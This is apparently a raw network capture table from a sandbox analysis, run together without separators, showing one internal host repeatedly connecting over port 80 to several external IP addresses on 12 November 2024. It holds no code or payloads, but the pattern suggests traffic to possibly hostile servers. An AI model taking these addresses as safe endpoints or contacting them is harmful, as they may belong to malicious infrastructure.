                                                                    Nov 12, 2024 18:49:07.928658009 CET5002080192.168.2.438.47.207.164
                                                                    Nov 12, 2024 18:49:08.050292969 CET805002038.47.207.164192.168.2.4
                                                                    Nov 12, 2024 18:49:08.052642107 CET5002080192.168.2.438.47.207.164
                                                                    Nov 12, 2024 18:49:08.426389933 CET5002080192.168.2.438.47.207.164
                                                                    Nov 12, 2024 18:49:09.448504925 CET5002180192.168.2.438.47.207.164
                                                                    Nov 12, 2024 18:49:09.454256058 CET805002138.47.207.164192.168.2.4
                                                                    Nov 12, 2024 18:49:09.460483074 CET5002180192.168.2.438.47.207.164
                                                                    Nov 12, 2024 18:49:09.468501091 CET5002180192.168.2.438.47.207.164
                                                                    Nov 12, 2024 18:49:09.473705053 CET805002138.47.207.164192.168.2.4
                                                                    Nov 12, 2024 18:49:09.473722935 CET805002138.47.207.164192.168.2.4
                                                                    Nov 12, 2024 18:49:09.473786116 CET805002138.47.207.164192.168.2.4
                                                                    Nov 12, 2024 18:49:09.473795891 CET805002138.47.207.164192.168.2.4
                                                                    Nov 12, 2024 18:49:09.473874092 CET805002138.47.207.164192.168.2.4
                                                                    Nov 12, 2024 18:49:09.473882914 CET805002138.47.207.164192.168.2.4
                                                                    Nov 12, 2024 18:49:09.473942995 CET805002138.47.207.164192.168.2.4
                                                                    Nov 12, 2024 18:49:09.473952055 CET805002138.47.207.164192.168.2.4
                                                                    Nov 12, 2024 18:49:09.473961115 CET805002138.47.207.164192.168.2.4
                                                                    Nov 12, 2024 18:49:10.419212103 CET805002138.47.207.164192.168.2.4
                                                                    Nov 12, 2024 18:49:10.473141909 CET5002180192.168.2.438.47.207.164
                                                                    Nov 12, 2024 18:49:10.608990908 CET805002138.47.207.164192.168.2.4
                                                                    Nov 12, 2024 18:49:10.609044075 CET5002180192.168.2.438.47.207.164
                                                                    Nov 12, 2024 18:49:10.973187923 CET5002180192.168.2.438.47.207.164
                                                                    Nov 12, 2024 18:49:11.997519016 CET5002280192.168.2.438.47.207.164
                                                                    Nov 12, 2024 18:49:12.002892017 CET805002238.47.207.164192.168.2.4
                                                                    Nov 12, 2024 18:49:12.004539013 CET5002280192.168.2.438.47.207.164
                                                                    Nov 12, 2024 18:49:12.011303902 CET5002280192.168.2.438.47.207.164
                                                                    Nov 12, 2024 18:49:12.016321898 CET805002238.47.207.164192.168.2.4
                                                                    Nov 12, 2024 18:49:12.961158037 CET805002238.47.207.164192.168.2.4
                                                                    Nov 12, 2024 18:49:13.004291058 CET5002280192.168.2.438.47.207.164
                                                                    Nov 12, 2024 18:49:13.143934011 CET805002238.47.207.164192.168.2.4
                                                                    Nov 12, 2024 18:49:13.144036055 CET5002280192.168.2.438.47.207.164
                                                                    Nov 12, 2024 18:49:13.145173073 CET5002280192.168.2.438.47.207.164
                                                                    Nov 12, 2024 18:49:13.150074959 CET805002238.47.207.164192.168.2.4
                                                                    Nov 12, 2024 18:49:18.202495098 CET5002380192.168.2.43.33.130.190
                                                                    Nov 12, 2024 18:49:18.207422018 CET80500233.33.130.190192.168.2.4
                                                                    Nov 12, 2024 18:49:18.208347082 CET5002380192.168.2.43.33.130.190
                                                                    Nov 12, 2024 18:49:18.220218897 CET5002380192.168.2.43.33.130.190
                                                                    Nov 12, 2024 18:49:18.225058079 CET80500233.33.130.190192.168.2.4
                                                                    Nov 12, 2024 18:49:18.835414886 CET80500233.33.130.190192.168.2.4
                                                                    Nov 12, 2024 18:49:18.835469961 CET5002380192.168.2.43.33.130.190
                                                                    Nov 12, 2024 18:49:19.722903013 CET5002380192.168.2.43.33.130.190
                                                                    Nov 12, 2024 18:49:19.727869034 CET80500233.33.130.190192.168.2.4
                                                                    Nov 12, 2024 18:49:20.742094994 CET5002480192.168.2.43.33.130.190
                                                                    Nov 12, 2024 18:49:20.747406960 CET80500243.33.130.190192.168.2.4
                                                                    Nov 12, 2024 18:49:20.747473955 CET5002480192.168.2.43.33.130.190
                                                                    Nov 12, 2024 18:49:20.760190964 CET5002480192.168.2.43.33.130.190
                                                                    Nov 12, 2024 18:49:20.765058994 CET80500243.33.130.190192.168.2.4
                                                                    Nov 12, 2024 18:49:21.374962091 CET80500243.33.130.190192.168.2.4
                                                                    Nov 12, 2024 18:49:21.375037909 CET5002480192.168.2.43.33.130.190
                                                                    Nov 12, 2024 18:49:22.277597904 CET5002480192.168.2.43.33.130.190
                                                                    Nov 12, 2024 18:49:22.282893896 CET80500243.33.130.190192.168.2.4
                                                                    Nov 12, 2024 18:49:23.288290024 CET5002580192.168.2.43.33.130.190
                                                                    Nov 12, 2024 18:49:23.293313026 CET80500253.33.130.190192.168.2.4
                                                                    Nov 12, 2024 18:49:23.293425083 CET5002580192.168.2.43.33.130.190
                                                                    Nov 12, 2024 18:49:23.304402113 CET5002580192.168.2.43.33.130.190
                                                                    Nov 12, 2024 18:49:23.309385061 CET80500253.33.130.190192.168.2.4
                                                                    Nov 12, 2024 18:49:23.309407949 CET80500253.33.130.190192.168.2.4
                                                                    Nov 12, 2024 18:49:23.309426069 CET80500253.33.130.190192.168.2.4
                                                                    Nov 12, 2024 18:49:23.309436083 CET80500253.33.130.190192.168.2.4
                                                                    Nov 12, 2024 18:49:23.309447050 CET80500253.33.130.190192.168.2.4
                                                                    Nov 12, 2024 18:49:23.309729099 CET80500253.33.130.190192.168.2.4
                                                                    Nov 12, 2024 18:49:23.309739113 CET80500253.33.130.190192.168.2.4
                                                                    Nov 12, 2024 18:49:23.309747934 CET80500253.33.130.190192.168.2.4
                                                                    Nov 12, 2024 18:49:23.309767962 CET80500253.33.130.190192.168.2.4
                                                                    Nov 12, 2024 18:49:23.922446012 CET80500253.33.130.190192.168.2.4
                                                                    Nov 12, 2024 18:49:23.922621965 CET5002580192.168.2.43.33.130.190
                                                                    Nov 12, 2024 18:49:24.816524982 CET5002580192.168.2.43.33.130.190
                                                                    Nov 12, 2024 18:49:24.823060989 CET80500253.33.130.190192.168.2.4
                                                                    Nov 12, 2024 18:49:25.838325977 CET5002680192.168.2.43.33.130.190
                                                                    Nov 12, 2024 18:49:25.843310118 CET80500263.33.130.190192.168.2.4
                                                                    Nov 12, 2024 18:49:25.843436956 CET5002680192.168.2.43.33.130.190
                                                                    Nov 12, 2024 18:49:25.854284048 CET5002680192.168.2.43.33.130.190
                                                                    Nov 12, 2024 18:49:25.859179974 CET80500263.33.130.190192.168.2.4
                                                                    Nov 12, 2024 18:49:26.482073069 CET80500263.33.130.190192.168.2.4
                                                                    Nov 12, 2024 18:49:26.482980967 CET80500263.33.130.190192.168.2.4
                                                                    Nov 12, 2024 18:49:26.483031034 CET5002680192.168.2.43.33.130.190
                                                                    Nov 12, 2024 18:49:26.486490965 CET5002680192.168.2.43.33.130.190
                                                                    Nov 12, 2024 18:49:26.491322041 CET80500263.33.130.190192.168.2.4
                                                                    Nov 12, 2024 18:49:31.551573992 CET5002780192.168.2.4103.21.221.4
                                                                    Nov 12, 2024 18:49:31.557022095 CET8050027103.21.221.4192.168.2.4
                                                                    Nov 12, 2024 18:49:31.557291985 CET5002780192.168.2.4103.21.221.4
                                                                    Nov 12, 2024 18:49:31.569828987 CET5002780192.168.2.4103.21.221.4
                                                                    Nov 12, 2024 18:49:31.574878931 CET8050027103.21.221.4192.168.2.4
                                                                    Nov 12, 2024 18:49:32.575869083 CET8050027103.21.221.4192.168.2.4
                                                                    Nov 12, 2024 18:49:32.628722906 CET5002780192.168.2.4103.21.221.4
                                                                    Nov 12, 2024 18:49:32.780630112 CET8050027103.21.221.4192.168.2.4
                                                                    Nov 12, 2024 18:49:32.780687094 CET5002780192.168.2.4103.21.221.4
                                                                    Nov 12, 2024 18:49:33.081965923 CET5002780192.168.2.4103.21.221.4
                                                                    Nov 12, 2024 18:49:34.100634098 CET5002880192.168.2.4103.21.221.4
                                                                    Nov 12, 2024 18:49:34.105653048 CET8050028103.21.221.4192.168.2.4
                                                                    Nov 12, 2024 18:49:34.105828047 CET5002880192.168.2.4103.21.221.4
                                                                    Nov 12, 2024 18:49:34.119739056 CET5002880192.168.2.4103.21.221.4
                                                                    Nov 12, 2024 18:49:34.124798059 CET8050028103.21.221.4192.168.2.4
                                                                    Nov 12, 2024 18:49:35.112253904 CET8050028103.21.221.4192.168.2.4
                                                                    Nov 12, 2024 18:49:35.159902096 CET5002880192.168.2.4103.21.221.4
                                                                    Nov 12, 2024 18:49:35.319053888 CET8050028103.21.221.4192.168.2.4
                                                                    Nov 12, 2024 18:49:35.319175005 CET5002880192.168.2.4103.21.221.4
                                                                    Nov 12, 2024 18:49:35.628700972 CET5002880192.168.2.4103.21.221.4
                                                                    Nov 12, 2024 18:49:36.648964882 CET5002980192.168.2.4103.21.221.4
                                                                    Nov 12, 2024 18:49:36.654050112 CET8050029103.21.221.4192.168.2.4
                                                                    Nov 12, 2024 18:49:36.654130936 CET5002980192.168.2.4103.21.221.4
                                                                    Nov 12, 2024 18:49:36.668064117 CET5002980192.168.2.4103.21.221.4
                                                                    Nov 12, 2024 18:49:36.673038960 CET8050029103.21.221.4192.168.2.4
                                                                    Nov 12, 2024 18:49:36.673069954 CET8050029103.21.221.4192.168.2.4
                                                                    Nov 12, 2024 18:49:36.673079967 CET8050029103.21.221.4192.168.2.4
                                                                    Nov 12, 2024 18:49:36.673171043 CET8050029103.21.221.4192.168.2.4
                                                                    Nov 12, 2024 18:49:36.673181057 CET8050029103.21.221.4192.168.2.4
                                                                    Nov 12, 2024 18:49:36.673188925 CET8050029103.21.221.4192.168.2.4
                                                                    Nov 12, 2024 18:49:36.673207045 CET8050029103.21.221.4192.168.2.4
                                                                    Nov 12, 2024 18:49:36.673216105 CET8050029103.21.221.4192.168.2.4
                                                                    Nov 12, 2024 18:49:36.673224926 CET8050029103.21.221.4192.168.2.4
                                                                    Nov 12, 2024 18:49:37.660224915 CET8050029103.21.221.4192.168.2.4
                                                                    Nov 12, 2024 18:49:37.707674026 CET5002980192.168.2.4103.21.221.4
                                                                    Nov 12, 2024 18:49:37.866595984 CET8050029103.21.221.4192.168.2.4
                                                                    Nov 12, 2024 18:49:37.867754936 CET5002980192.168.2.4103.21.221.4
                                                                    Nov 12, 2024 18:49:38.175565004 CET5002980192.168.2.4103.21.221.4
                                                                    Nov 12, 2024 18:49:39.194633961 CET5003080192.168.2.4103.21.221.4
                                                                    Nov 12, 2024 18:49:39.199664116 CET8050030103.21.221.4192.168.2.4
                                                                    Nov 12, 2024 18:49:39.199733973 CET5003080192.168.2.4103.21.221.4
                                                                    Nov 12, 2024 18:49:39.207734108 CET5003080192.168.2.4103.21.221.4
                                                                    Nov 12, 2024 18:49:39.212790012 CET8050030103.21.221.4192.168.2.4
                                                                    Nov 12, 2024 18:49:40.204647064 CET8050030103.21.221.4192.168.2.4
                                                                    Nov 12, 2024 18:49:40.253506899 CET5003080192.168.2.4103.21.221.4
                                                                    Nov 12, 2024 18:49:40.402888060 CET8050030103.21.221.4192.168.2.4
                                                                    Nov 12, 2024 18:49:40.403707027 CET5003080192.168.2.4103.21.221.4
                                                                    Nov 12, 2024 18:49:40.407553911 CET5003080192.168.2.4103.21.221.4
                                                                    Nov 12, 2024 18:49:40.412497044 CET8050030103.21.221.4192.168.2.4
                                                                    Nov 12, 2024 18:49:45.628143072 CET5003180192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:45.633505106 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:45.637636900 CET5003180192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:45.649389029 CET5003180192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:45.654329062 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.307281971 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.307310104 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.307332039 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.307374954 CET5003180192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:46.307662010 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.307815075 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.307868958 CET5003180192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:46.308185101 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.308198929 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.308221102 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.308224916 CET5003180192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:46.308238029 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.308844090 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.308892012 CET5003180192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:46.313348055 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.313505888 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.313520908 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.313546896 CET5003180192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:46.362720966 CET5003180192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:46.421853065 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.421910048 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.421921015 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.422049046 CET5003180192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:46.422311068 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.422399044 CET5003180192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:46.422569036 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.422583103 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.422911882 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.422923088 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.422952890 CET5003180192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:46.423001051 CET5003180192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:46.423235893 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.423247099 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.423352003 CET5003180192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:46.423657894 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.423675060 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.423739910 CET5003180192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:46.424042940 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.472085953 CET5003180192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:46.537210941 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.537307024 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.537319899 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.537355900 CET5003180192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:46.537719965 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.537758112 CET5003180192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:46.537818909 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.538077116 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.538088083 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.538099051 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.538116932 CET5003180192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:46.538136959 CET5003180192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:46.538667917 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.539702892 CET8050031203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:46.539757013 CET5003180192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:47.159751892 CET5003180192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:48.178457975 CET5003280192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:48.183775902 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.183922052 CET5003280192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:48.194948912 CET5003280192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:48.199872017 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.868078947 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.868172884 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.868185043 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.868213892 CET5003280192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:48.868633032 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.868645906 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.868658066 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.868669987 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.868669987 CET5003280192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:48.868683100 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.868704081 CET5003280192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:48.868748903 CET5003280192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:48.869458914 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.869468927 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.869518042 CET5003280192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:48.873123884 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.873217106 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.873230934 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.873260975 CET5003280192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:48.873547077 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.873586893 CET5003280192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:48.986753941 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.986814022 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.986829042 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.986855984 CET5003280192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:48.987135887 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.987148046 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.987179041 CET5003280192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:48.987513065 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.987549067 CET5003280192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:48.987679958 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.987694979 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.987708092 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.987720966 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.987729073 CET5003280192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:48.987756014 CET5003280192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:48.988522053 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.988533020 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.988543987 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.988555908 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.988574028 CET5003280192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:48.988599062 CET5003280192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:48.989447117 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.989459991 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.989473104 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.989500046 CET5003280192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:48.989948034 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.989965916 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.989978075 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.989994049 CET5003280192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:48.990010023 CET5003280192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:48.990571022 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.990586042 CET8050032203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:48.990626097 CET5003280192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:49.706602097 CET5003280192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:50.725692987 CET5003380192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:50.730880976 CET8050033203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:50.730963945 CET5003380192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:50.743695974 CET5003380192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:50.748737097 CET8050033203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:50.748758078 CET8050033203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:50.748797894 CET8050033203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:50.748809099 CET8050033203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:50.748825073 CET8050033203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:50.748867035 CET8050033203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:50.748876095 CET8050033203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:50.748883963 CET8050033203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:50.749233007 CET8050033203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:52.253277063 CET5003380192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:52.259890079 CET8050033203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:52.261292934 CET5003380192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:53.272880077 CET5003480192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:53.278537035 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:53.278605938 CET5003480192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:53.285903931 CET5003480192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:53.292190075 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.144273996 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.144323111 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.144337893 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.144578934 CET5003480192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:54.144751072 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.144864082 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.144875050 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.145157099 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.145168066 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.145179033 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.145183086 CET5003480192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:54.145193100 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.145205021 CET5003480192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:54.145263910 CET5003480192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:54.149571896 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.149682999 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.149696112 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.149817944 CET5003480192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:54.149974108 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.154486895 CET5003480192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:54.261312962 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.261447906 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.261461020 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.261661053 CET5003480192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:54.261761904 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.261965036 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.261977911 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.262022972 CET5003480192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:54.262089014 CET5003480192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:54.262490988 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.262504101 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.262582064 CET5003480192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:54.262828112 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.262840033 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.262861013 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.262886047 CET5003480192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:54.262986898 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.263467073 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.263482094 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.263541937 CET5003480192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:54.263541937 CET5003480192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:54.375938892 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.376025915 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.376039982 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.376291990 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.376327038 CET5003480192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:54.376557112 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.376569033 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.376682997 CET5003480192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:54.376832962 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.376844883 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.377234936 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.377307892 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.377337933 CET5003480192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:54.377465963 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:54.377568007 CET5003480192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:54.383138895 CET5003480192.168.2.4203.161.46.201
                                                                    Nov 12, 2024 18:49:54.388086081 CET8050034203.161.46.201192.168.2.4
                                                                    Nov 12, 2024 18:49:59.443111897 CET5003580192.168.2.4104.21.4.93
                                                                    Nov 12, 2024 18:49:59.448075056 CET8050035104.21.4.93192.168.2.4
                                                                    Nov 12, 2024 18:49:59.448149920 CET5003580192.168.2.4104.21.4.93
                                                                    Nov 12, 2024 18:49:59.458235979 CET5003580192.168.2.4104.21.4.93
                                                                    Nov 12, 2024 18:49:59.463144064 CET8050035104.21.4.93192.168.2.4
                                                                    Nov 12, 2024 18:50:00.376020908 CET8050035104.21.4.93192.168.2.4
                                                                    Nov 12, 2024 18:50:00.395647049 CET8050035104.21.4.93192.168.2.4
                                                                    Nov 12, 2024 18:50:00.395740986 CET5003580192.168.2.4104.21.4.93
                                                                    Nov 12, 2024 18:50:00.971729994 CET5003580192.168.2.4104.21.4.93
